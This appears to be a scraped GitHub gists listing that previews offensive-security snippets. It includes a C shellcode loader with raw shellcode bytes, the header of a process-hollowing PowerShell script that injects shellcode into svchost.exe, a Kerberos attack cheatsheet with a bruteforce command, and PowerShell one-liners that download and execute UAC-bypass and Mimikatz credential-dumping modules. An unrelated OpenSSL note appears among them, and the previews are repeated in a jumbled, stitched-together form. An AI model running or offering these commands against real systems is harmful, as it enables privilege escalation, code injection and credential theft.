Razz LongWayHomie

## JasonToddIsTheBestRobin.c
#include <windows.h>
#include <wininet.h>
#include <stdio.h>

#pragma comment(lib, "wininet.lib")

// notepad.exe shellcode
char shellcode[] =  {
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
    0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,

## SilentListener.py
import random
import argparse
import tempfile
import ipaddress
from time import sleep
from shlex import split
from os import path, remove
from scapy.all import sniff
from threading import Thread
from subprocess import Popen, PIPE

## DynWin32-ShellcodeProcessHollowing.ps1
<#

DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.

When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed enveloped within the trusted svchost.exe process.

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              385 forks
            
          
                7 comments
              
            
              1149 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## RedTeam_CheatSheet.ps1
# Description:
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

## openssl.md

      
              1 file
            
          
              2 forks
            
          
                0 comments
              
            
              8 stars
            
          
                gorlok
                / openssl.md
            
            
              Last active
              October 1, 2025 10:04
            
              
                OpenSSL to create PFX file
              
          
    source: https://github.com/Azure/azure-xplat-cli/wiki/Getting-Self-Signed-SSL-Certificates-(.pem-and-.pfx)

Generating a private key:

openssl genrsa 2048 > private.pem


Generating the self signed certificate:

openssl req -x509 -new -key private.pem -out public.pem
	#include <windows.h>
	#include <wininet.h>
	#include <stdio.h>

	#pragma comment(lib, "wininet.lib")

	// notepad.exe shellcode
	char shellcode[] = {
	0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
	0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
	import random
	import argparse
	import tempfile
	import ipaddress
	from time import sleep
	from shlex import split
	from os import path, remove
	from scapy.all import sniff
	from threading import Thread
	from subprocess import Popen, PIPE
	<#

	DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
	dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
	GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
	and GetProcAddress to obtain the addresses of the other required Win32 API calls.

	When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
	and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
	and the shellcode is executed enveloped within the trusted svchost.exe process.
	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands